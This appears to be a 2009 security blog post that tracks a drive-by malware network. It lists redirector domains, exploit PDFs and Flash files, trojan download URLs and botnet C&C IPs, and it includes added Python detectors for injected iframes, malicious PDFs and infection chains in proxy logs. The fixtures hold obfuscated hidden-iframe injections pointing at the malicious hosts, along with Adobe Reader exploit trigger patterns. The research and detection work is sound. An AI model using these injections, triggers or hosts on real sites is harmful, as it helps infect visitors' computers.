Thursday, April 9, 2009

Black Hat SEO - RBN Hacks, p.1

The silent threat: Black Hat SEO, exploits, hacks, botnets

Inspecting the bad network

READ THIS page if you need more information

WARNING: All sites listed on this page are dangerous (live URLs serving exploits)
which lead to trojans being installed on your computer automatically.
Do NOT visit them unless you know what you are doing.
(Only the links to the analysis reports are safe to follow.)


If you want information about disinfection, check out this page:
Analysis of a website infected with a hidden iframe (by NoVirusThanks)

That page does not cover the disinfection of your own website once it has been
attacked and iframed.

For that, change your passwords (Windows passwords, FTP, e-mail, database
access, etc.) from a machine you trust, and remove the content injected into
each page as quickly as possible (contact your hosting provider for assistance).

This page references domains found in thousands of compromised websites, each
injected with obfuscated JavaScript code that writes a hidden IFRAME.
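The check a site owner wants at this point is a way to find the injection across a whole web root, because the iframe is usually written by document.write(unescape(...)) or eval(String.fromCharCode(...)) rather than sitting in the page as plain HTML. The scanner below is an added example (not code from the original post): its indicator list is the domains named on this page, and the sample pages it tests against are constructed here, not captured from any compromised site.

```python
"""Find injected hidden IFRAMEs, including ones hidden behind JS obfuscation.

Added example, not from the original post. KNOWN_BAD_DOMAINS are the hosts
named on this page; the HTML in SAMPLES is constructed for this example.
"""
import os
import re
import urllib.parse

KNOWN_BAD_DOMAINS = {
    "betstarwager.cn", "bestlotron.cn", "denverfilmdigitalmedia.cn",
    "diettopseek.cn", "filmlifemusicsite.cn", "filmtypemedia.cn",
    "litedownloadseek.cn", "litetopfindworld.cn", "litetoplocatesite.cn",
    "nanotopfind.cn", "promixgroup.cn", "yourliteseek.cn", "hostindianet.com",
}

_UNESCAPE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)", re.I)
_IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
_ATTR = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""", re.I)


def _js_unescape(s):
    """JavaScript unescape(): %uXXXX first, then ordinary %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s)


def deobfuscate(text, max_rounds=5):
    """Decode unescape('...') and String.fromCharCode(...) literals in place.
    Repeated because injections nest one encoding inside another; stops as
    soon as a round changes nothing. Literal arguments only: variables or
    arithmetic inside fromCharCode() need a real JS sandbox."""
    for _ in range(max_rounds):
        new = _UNESCAPE.sub(lambda m: _js_unescape(m.group(2)), text)
        new = _FROMCHARCODE.sub(
            lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
            new)
        if new == text:
            break
        text = new
    return text


def _attrs(tag):
    return {k.lower(): (v1 or v2 or v3) for k, v1, v2, v3 in _ATTR.findall(tag)}


def _is_hidden(a):
    """Hidden if 0/1 px in either dimension or styled invisible."""
    def tiny(v):
        try:
            return float(str(v).lower().rstrip("px")) <= 1
        except ValueError:
            return False
    style = a.get("style", "").replace(" ", "").lower()
    return (tiny(a.get("width", "")) or tiny(a.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


def _known_bad(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in KNOWN_BAD_DOMAINS)


def find_injected_iframes(html):
    """One finding per <iframe> after deobfuscation: src, host, hidden, listed."""
    findings = []
    for tag in _IFRAME.findall(deobfuscate(html)):
        a = _attrs(tag)
        src = a.get("src", "")
        host = urllib.parse.urlsplit(src).hostname or ""
        findings.append({"src": src, "host": host,
                         "hidden": _is_hidden(a), "known_bad": _known_bad(host)})
    return findings


def scan_tree(root, exts=(".html", ".htm", ".php", ".js")):
    """Walk a web root and report files carrying a hidden or listed iframe.
    Run it on a copy of the site before restoring from a clean backup."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = [f for f in find_injected_iframes(fh.read())
                        if f["hidden"] or f["known_bad"]]
            if hits:
                report[path] = hits
    return report


# Constructed samples: one clean page and three injection styles.
_INNER = ("document.write(unescape('%3Ciframe%20src%3D%22http%3A//zzzz.hostindianet.com"
          "/load.php%3Fid%3D4%22%20width%3D1%20height%3D1%3E%3C/iframe%3E'))")
SAMPLES = {
    "clean": '<iframe src="http://www.example.com/widget" width="300" height="200"></iframe>',
    "plain": '<body><iframe src="http://betstarwager.cn/in.cgi?cocacola" width=1 height=1 '
             'style="visibility:hidden"></iframe></body>',
    "unescape": "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//bestlotron.cn"
                "/in.cgi%3Fcocacola%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'))</script>",
    # eval(String.fromCharCode(...)) wrapped around the unescape() form: two layers
    "charcode": "<script>eval(String.fromCharCode(%s))</script>"
                % ",".join(str(ord(c)) for c in _INNER),
}
```

A hit on a site that is not on the indicator list but is hidden is still worth a look: the redirector domains rotate, the 1x1 pixel iframe does not. Cleaning the files without changing the stolen credentials just gets the site reinfected.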


The Zlkon network (DATORU EXPRESS SERVISS) has been cited in several blogs
for hosting malicious content for cyber criminals, for example:

On Symantec's website, for spreading the TDSS trojan [hs.2-104.zlkon.lv] in conjunction
with IPs at UkrTeleGroup Ltd. in December 2008:

85.255.115.156
85.255.112.87
85.255.115.50
85.255.112.154

On the MSMVPs blog, for inaccurate whois details, in January 2009
On the bluetack.co.uk forum, for rogue antivirus, here, in January 2009
Another example with "Total Defender", another rogue antivirus, here
Also covered on several other sites, including FireEye ("Bad Actors Part 2 - ZlKon")
and Dancho Danchev's blog
The associated network is cited here: Bad, bad, cybercrime-friendly ISPs!




A quick look at two IPs at Zlkon in Latvia


94.247.3.152 [hs.3-152.zlkon.lv]

Using the name servers

ns1.freednshostserver.com [78.109.18.234]
ns1.freednshostserver.com [78.109.18.235]

descr: Datacenter Hosting.UA
route: 78.109.16.0/20
origin: AS41665

these domains are currently live and hitting a lot of websites
(simply searching Google for one of the domains, or for "in.cgi?cocacola", turns up
plenty of discussion from owners of hacked, iframed sites):

betstarwager.cn/in.cgi?cocacola Analysis
bestlotron.cn/in.cgi?cocacola Analysis
denverfilmdigitalmedia.cn/in.cgi?cocacola Analysis
diettopseek.cn/in.cgi?cocacola Analysis
filmlifemusicsite.cn/in.cgi?cocacola Analysis
filmlifemusicsite.cn/ Analysis
filmtypemedia.cn/in.cgi?cocacola Analysis
litedownloadseek.cn/in.cgi?cocacola Analysis
litetopfindworld.cn/in.cgi?cocacola Analysis
litetoplocatesite.cn/in.cgi?cocacola Analysis
nanotopfind.cn/in.cgi?cocacola Analysis
promixgroup.cn/in.cgi?cocacola Analysis
yourliteseek.cn/in.cgi?cocacola Analysis
   
ghrgt.hostindianet.com/index.php Analysis
lieliteautobody.cn/load.php?id=4
[94.247.3.151]
Anubis - VirusTotal
Botnet C&C: 213.155.4.82
Anubis Family 1175580
   
ghrgt.hostindianet.com/cache/readme.pdf Analysis
zzzz.hostindianet.com/load.php?id=4 Anubis - VirusTotal
Botnet C&C:
213.155.4.80
78.109.30.224
   

Also cited on Dancho Danchev's blog, here, in his series on iframed embassy websites (11 of them, including hostindianet[.]com).





On the next IP:

94.247.3.151 [hs.3-151.zlkon.lv]

hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)  
hxxp://cheapslotplay.cn/in.cgi?income48 Redirect to exploit
hxxp://hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis
hxxp://daddybigtop.cn
Load trojan on
hxxp://freeonlinehostguide.com/load.php
VirusTotal - Redirection Analysis - Anubis
Detection:
Trojan-Downloader.Win32.Bredolab!IK
TR/Crypt.ZPACK.Gen
Trojan-Downloader.Win32.Bredolab
Trojan:Win32/Meredrop

Uses a stack overflow in Adobe Reader 8.1.2 and earlier
(util.printf, CVE-2008-2992)
hxxp://educationbigtop.cn VirusTotal Report (Bredolab)
hxxp://freehostinternet.com Load trojan on
hxxp://daddybigtop.cn/load.php
VirusTotal - Anubis
Detection:
Trojan-Downloader.Win32.Bredolab

Connects to botnet C&C: 213.155.6.33
hxxp://freeonlinehostguide.com/
index.php
Load trojan on
hxxp://zzz.free.hostindianet.com/load.php?id=4
VirusTotal - Javascript Analysis - Anubis
Detection:
TR/Crypt.XPACK.Gen
Win32:Walpak
Win32/Kryptik.LI
Trojan.Waledac.Gen!Pac.8

It connects to a URL and drops the file "digiwet.dll"
Botnets C&C:
turokgame.cn [74.50.98.156]
94.247.2.95 and 78.109.30.224
hxxp://freewebhostguide.com Symantec
hxxp://greatbethere.cn Load trojan on
hxxp://greatbethere.cn/load.php?id=4
VirusTotal - Javascript Analysis - Anubis
Detection:
TR/Crypt.XPACK.Gen
Win32:Walpak
Win32/Kryptik.LI
Trojan.Waledac.Gen!Pac.8

Uses a stack overflow in Adobe Reader 8.1.1 and earlier (Collab.collectEmailInfo, CVE-2007-5659)

It connects to a URL and drops the file "digiwet.dll"
Botnets C&C:
213.155.6.32
78.109.30.224
hxxp://hugetopnonfat.cn dead
hxxp://mediahomenamemartvideo.cn/
in.cgi?income
Botnet C&C / redirect to exploit
hxxp://hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Redirection Analysis - Anubis
hxxp://hyperliteautoservices.cn Redirect to exploit
hxxp://hyperliteautoservices.cn/index.php
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Redirection Analysis - Anubis
Flash exploit is also live:

Flash Analysis
Botnet C&C: 78.109.29.112
hxxp://lieliteautobody.cn (dead)  
hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there
hxxp://liteautofinestsite.cn/load.php
hxxp://liteautogreatest.cn Exploits:
hxxp://liteautogreatest.cn/cache/readme.pdf
hxxp://liteautogreatest.cn/cache/flash.swf
to load trojan on
hxxp://liteautogreatest.cn/load.php
VirusTotal - Redirection Analysis - Anubis

Flash exploit is also live:
Flash Analysis - VirusTotal

Botnet C&C: 78.109.29.112
hxxp://liteautorepair.cn Exploit to load trojan on
zzzz.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
Trojan-Downloader.Win32.Bredolab

Botnet controller: 213.155.4.82
hxxp://litedownloadfinest.cn Exploit to load trojan on
zzzz.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
TrojanDownloader:Win32/Bredolab.B

Previous botnet controller: 78.109.29.112
hxxp://litehitscar.cn/index.php Exploit to load trojan on
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
Trojan.Botnetlog.3

Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82
hxxp://lieliteautobody.cn/load.php Exploit not found but trojan still there
lieliteautobody.cn/load.php
hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there
liteautofinestsite.cn/load.php
hxxp://liteupyourride.cn/ Exploits:
hxxp://liteupyourride.cn/cache/readme.pdf
hxxp://liteupyourride.cn/cache/flash.swf
to load trojan on
hxxp://litehitscar.cn/load.php
VirusTotal - Anubis

PDF exploit is also live:
PDF Analysis - VirusTotal

Botnet C&C: 78.109.29.112
hxxp://yournonfatbest.cn Exploit to load trojan on
farm-en-12san.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
TrojanDownloader:Win32/Bredolab.G

Botnets:
213.155.4.82
78.109.30.224
hxxp://lotbetsite.cn Exploit to load trojan on
casinoslotbet.cn/load.php - Analysis
VirusTotal - Anubis - Flash Exploit Analysis

Detection:
Trojan-Downloader.Win32.Bredolab

Botnet:
213.155.6.33
   
hxxp://hugetopnonfat.cn/in.cgi?id1000 Javascript Analysis
hxxp://PremiumNonfat.cn/all/
dead
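The readme.pdf files served from the /cache/ directories above carry the two Adobe Reader bugs this page cites: CVE-2008-2992 (util.printf, Reader 8.1.2 and earlier) and CVE-2007-5659 (Collab.collectEmailInfo, Reader 8.1.1 and earlier). A first-pass triage of such a PDF does not need a full parser: inflate the FlateDecode streams, undo /J#53-style name escaping, then look for the vulnerable API names and the OpenAction/AA hooks that auto-run them. The block below is an added example (not the original post's code, and not the actual readme.pdf); its sample PDFs are constructed inside the block and carry no shellcode, only the API usage signatures.

```python
"""Static triage of a PDF for the Reader JavaScript exploits cited above.

Added example, not from the original post. Not a PDF parser: it inflates
FlateDecode streams, normalises #XX name escapes and keyword-matches. Other
filters (ASCIIHex, LZW) and hex-string JS need a fuller tool; this catches
the common FlateDecode + OpenAction delivery. Samples are constructed here.
"""
import re
import zlib

# JS APIs behind the two CVEs on this page, plus a common staging sign.
SUSPICIOUS_JS = {
    "util.printf": "CVE-2008-2992 (util.printf stack overflow, Reader 8.1.2 and earlier)",
    "Collab.collectEmailInfo": "CVE-2007-5659 (Collab.collectEmailInfo overflow, Reader 8.1.1 and earlier)",
    "unescape(": "shellcode / heap-spray staging",
}
# Auto-run hooks and script/launch carriers worth flagging on sight.
STRUCT_FLAGS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile")

_OBJ = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
_STREAM = re.compile(rb"\bstream\r?\n(.*?)\nendstream", re.S)
_NAME_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")


def decoded_objects(pdf):
    """Map object number -> object bytes, with a FlateDecode stream inflated
    in place. A stream that fails to inflate is kept raw so the keyword
    checks still run over whatever is there."""
    objs = {}
    for num, body in _OBJ.findall(pdf):
        m = _STREAM.search(body)
        if m:
            data = m.group(1)
            if b"/FlateDecode" in body[:m.start()]:
                try:
                    data = zlib.decompress(data)
                except zlib.error:
                    pass
            body = body[:m.start()] + b"stream\n" + data + b"\nendstream"
        objs[int(num)] = body
    return objs


def triage(pdf):
    """Return the structural flags, the vulnerable APIs found and a verdict."""
    text = b"\n".join(decoded_objects(pdf).values())
    # /J#53 is a legal spelling of /JS; normalise so the checks see it.
    text = _NAME_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), text)
    flags = [f.decode() for f in STRUCT_FLAGS if f in text]
    apis = {k: v for k, v in SUSPICIOUS_JS.items() if k.encode() in text}
    auto_js = b"/JavaScript" in text and (b"/OpenAction" in text or b"/AA" in text)
    verdict = "suspicious" if apis or auto_js else "clean"
    return {"flags": flags, "apis": apis, "verdict": verdict}


def build_sample_pdf(js):
    """Constructed minimal PDF: the catalog's OpenAction runs `js`, stored in
    a FlateDecode stream and referenced through an escaped /J#53 name."""
    body = zlib.compress(js.encode())
    objs = [
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj",
        b"4 0 obj << /S /JavaScript /J#53 5 0 R >> endobj",
        b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(body)
        + body + b"\nendstream\nendobj",
    ]
    return b"%PDF-1.4\n" + b"\n".join(objs) + b"\ntrailer << /Root 1 0 R >>\n%%EOF\n"


# Constructed: API usage patterns only, no shellcode, nothing that runs.
SAMPLE_PRINTF = build_sample_pdf("var s = unescape('%u9090%u9090'); util.printf('%45000f', 0);")
SAMPLE_COLLAB = build_sample_pdf("Collab.collectEmailInfo({msg: s});")
SAMPLE_CLEAN = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
                b"trailer << /Root 1 0 R >>\n%%EOF\n")
```

The verdict is deliberately coarse: any JavaScript that runs on open is reason enough to pull the file into a sandbox, and a patched Reader (8.1.3 for the util.printf bug, 8.1.2 for collectEmailInfo) is the only real fix on the client side.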


94.247.3.150 [hs.3-150.zlkon.lv]

hxxp://autobestwestern.cn/
cache/readme.pdf
Exploit to load trojan on
litehitscar.cn/load.php?id=5 - Analysis
VirusTotal - Anubis - Flash Exploit Analysis

Detection:
TrojanDownloader:Win32/Bredolab.Q

Botnet:
78.109.29.112
hxxp://coolnameshop.cn/in.cgi?income 
hxxp://cutlot.cn/in.cgi?income Botnet C&C / Exploits to
hxxp://liteautogreatest.cn/index.php
Analysis
then load trojan located
hxxp://litehitscar.cn/load.php?id=5
VirusTotal - Anubis

Botnets:
78.109.29.112 - 78.109.30.224
hxxp://dotcomnameshop.cn Botnet C&C
hxxp://lotante.cn Botnet C&C / Exploits to litehitscar.cn/index.php
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://lotbetworld.cn/in.cgi?income Botnet C&C / Exploits to litehitscar.cn/index.php
[94.247.3.151]
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://homenameregistration.cn Botnet C&C / Exploits to 78.41.207.196/vertu/?t=5
Analysis
then load trojan located
78.41.207.196
Analysis
hxxp://hugetopnonfat.cn Botnet C&C
hxxp://dotcomnameshop.cn/
in.cgi?income
Botnet C&C / Redirect to exploits
hxxp://litehitscar.cn/index.php
[94.247.3.151]
Redirection Analysis - Exploit analysis
then load trojan located
hxxp://hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://japanhostnet.com/
in.cgi?income
Botnet C&C / Redirect to exploits litehitscar.cn/index.php
[94.247.3.151]
Redirection Analysis - Exploit analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://internetnamestore.cn/
in.cgi?income18
hyperliteautoservices.cn/index.php [94.247.3.151] Analysis
hxxp://lotmachinesguide.cn/
in.cgi?income
Redirects to exploits
hxxp://liteautogreatest.cn/cache/readme.pdf
hxxp://liteautogreatest.cn/cache/flash.swf
to load trojan on
hxxp://liteautogreatest.cn/load.php
VirusTotal - Redirection Analysis - Anubis

Botnet C&C: 78.109.29.112
hxxp://mainnameshop.cn Redirect to exploits sdfi.hostindianet.com/index.php (dead)

Detection: Win32/Bredolab.B
hxxp://mediahomenamemartvideo.cn Botnet C&C down (TS v3.2)
hxxp://mediahousenameshopfilm.cn 
hxxp://nameashop.cn/in.cgi?income On 2009-03-21 01:40:07 - Analysis
Redirect to exploit on
hxxp://sadcwed.hostindianet.com/index.php
On 2009-04-05 13:22:58 - Analysis
Redirect to exploit on
freeonlinehostguide.com/index.php
Analysis - VirusTotal - Anubis
Detection: Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen
It connects to a botnet and drops the file "digiwet.dll"
Botnets:
turokgame.cn [74.50.98.156]
94.247.2.95 and 78.109.30.224
hxxp://namebrandmart.cn/in.cgi
?income18
litehitscar.cn/load.php Analysis
hxxp://namebuyline.cn Analysis
hxxp://namebuypicture.cn/
in.cgi?income31
Botnet C&C / redirect to exploit
hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis - Analysis
hxxp://namesupermart.cn Botnet C&C
hxxp://namestorefilmlife.cn/
in.cgi?income
Botnet C&C / Exploits to litehitscar.cn
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
hxxp://perfectnamestore.cn
/in.cgi?income8
Redirect to exploit
hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis
[94.247.3.151]
hxxp://playbetwager.cn/in.cgi?income
freeonlinehostguide.com/index.php
hxxp://superbetfair.cn/in.cgi?income Botnet C&C / Exploits to litehitscar.cn
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis - Redirection Analysis
Detection: Trojan.Botnetlog.3
hxxp://thelotbet.cn 
hxxp://yourfilmmovie.cn Botnet C&C


hxxp://freeonlinehostguide.com/index.php Analysis
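Every entry above follows the same chain: an in.cgi redirector, an index.php (or readme.pdf / flash.swf) exploit page, a load.php download, then a connection to the C&C address. That ordering is what to hunt for in proxy logs, and it is more reliable than any single domain, since the .cn redirectors rotate while the chain shape does not. The block below is an added example (not from the original post): it classifies each request into a chain stage using a subset of the hosts and addresses listed on this page and reports, per client, whether the chain completed. The log format and all of the log lines are constructed for the example.

```python
"""Detect the redirector -> exploit -> load.php -> C&C chain in proxy logs.

Added example, not from the original post. Indicators are a subset of the
hosts and addresses on this page (extend with the rest). The log format and
every line in SAMPLE_LOG are constructed for this example:
    <epoch> <client_ip> <method> <url> <status> <server_ip>
"""
from collections import defaultdict
from urllib.parse import urlsplit

BAD_DOMAINS = {
    "betstarwager.cn", "bestlotron.cn", "litehitscar.cn", "liteautogreatest.cn",
    "hyperliteautoservices.cn", "hostindianet.com", "freeonlinehostguide.com",
    "lieliteautobody.cn", "liteupyourride.cn", "cutlot.cn", "lotante.cn",
    "nameashop.cn", "casinoslotbet.cn",
}
C2_HOSTS = {"turokgame.cn"}
C2_IPS = {"213.155.4.80", "213.155.4.82", "213.155.6.32", "213.155.6.33",
          "78.109.29.112", "78.109.30.224", "74.50.98.156", "94.247.2.95",
          "74.54.77.82"}
HOSTING_IPS = {"94.247.3.150", "94.247.3.151", "94.247.3.152"}  # Zlkon hosts
EXPLOIT_PATHS = ("/index.php", "/cache/readme.pdf", "/cache/flash.swf")


def _listed(host):
    return any(host == d or host.endswith("." + d) for d in BAD_DOMAINS)


def classify(url, server_ip):
    """Stage of the infection chain one request belongs to, or None."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if server_ip in C2_IPS or host in C2_IPS or host in C2_HOSTS:
        return "c2"
    if _listed(host) or server_ip in HOSTING_IPS:
        if u.path == "/load.php":
            return "payload"
        if u.path.endswith("/in.cgi"):
            return "redirector"
        if u.path in EXPLOIT_PATHS or u.path.endswith((".pdf", ".swf")):
            return "exploit"
        return "contact"
    if u.path.endswith("/in.cgi"):
        return "redirector"  # in.cgi TDS on an unlisted host: weaker, still worth a look
    return None


def parse_line(line):
    ts, client, method, url, status, server = line.split()
    return {"ts": int(ts), "client": client, "method": method,
            "url": url, "status": int(status), "server": server}


def correlate(lines):
    """Per client: the chain events in time order and a verdict.
    'compromised' = payload fetched or C&C reached; 'exposed' = redirector
    or exploit page only (blocked, patched, or the exploit failed)."""
    chains = defaultdict(list)
    for line in lines:
        r = parse_line(line)
        stage = classify(r["url"], r["server"])
        if stage:
            chains[r["client"]].append((r["ts"], stage, r["url"]))
    verdicts = {}
    for client, events in chains.items():
        events.sort()
        stages = {s for _, s, _ in events}
        if stages & {"payload", "c2"}:
            verdicts[client] = "compromised"
        elif stages & {"redirector", "exploit"}:
            verdicts[client] = "exposed"
        else:
            verdicts[client] = "contact"
    return verdicts, dict(chains)


# Constructed log: one full chain, one chain cut off at the exploit page,
# one client that never touched the infrastructure.
SAMPLE_LOG = [
    "1239200000 10.0.0.5 GET http://www.example-victim.org/index.html 200 203.0.113.10",
    "1239200001 10.0.0.5 GET http://betstarwager.cn/in.cgi?cocacola 302 94.247.3.152",
    "1239200002 10.0.0.5 GET http://litehitscar.cn/index.php 200 94.247.3.151",
    "1239200003 10.0.0.5 GET http://liteautogreatest.cn/cache/readme.pdf 200 94.247.3.151",
    "1239200005 10.0.0.5 GET http://hyperliteautoservices.cn/load.php?id=4 200 94.247.3.151",
    "1239200065 10.0.0.5 POST http://78.109.29.112/ 200 78.109.29.112",
    "1239200100 10.0.0.9 GET http://www.example.com/ 200 198.51.100.7",
    "1239200101 10.0.0.9 GET http://bestlotron.cn/in.cgi?cocacola 302 94.247.3.152",
    "1239200102 10.0.0.9 GET http://litehitscar.cn/index.php 403 94.247.3.151",
    "1239200200 10.0.0.12 GET http://www.example.net/news 200 198.51.100.8",
]
```

The request immediately before the redirector hit (www.example-victim.org in the constructed log) is the compromised legitimate site that carries the injected iframe; with referer logging enabled it shows up directly in the in.cgi request and is worth reporting to the site's owner.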

DNS (name servers shared by the domains above)

AS48856
VENTREX-AS Ventrex LLP

95.129.144.210

freednshostway.com
ns1.bigtopescorts.cn
ns1.casinobigtop.cn
ns1.casinoslotbet.cn
ns1.cheapslotplay.cn
ns1.daddybigtop.cn
ns1.educationbigtop.cn
ns1.freednshostway.com
ns1.freehostinternet.com
ns1.freeonlinehostguide.com
ns1.freewebhostguide.com
ns1.greatbethere.cn
ns1.hostindianet.com
ns1.hyperliteautoservices.cn
ns1.lieliteautobody.cn
ns1.liteautofinestsite.cn
ns1.liteautorepair.cn
ns1.litehitscar.cn
ns1.lotante.cn
ns1.lotbetsite.cn
ns1.playbetwager.cn

AS34187
RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine

78.26.179.79

ns2.bigtopescorts.cn
ns2.casinobigtop.cn
ns2.casinoslotbet.cn
ns2.cheapslotplay.cn
ns2.daddybigtop.cn
ns2.educationbigtop.cn
ns2.freednshostway.com
ns2.freehostinternet.com
ns2.freeonlinehostguide.com
ns2.freewebhostguide.com
ns2.greatbethere.cn
ns2.hostindianet.com
ns2.hyperliteautoservices.cn
ns2.lieliteautobody.cn
ns2.liteautofinestsite.cn
ns2.liteautorepair.cn
ns2.litehitscar.cn
ns2.lotante.cn
ns2.lotbetsite.cn
ns2.playbetwager.cn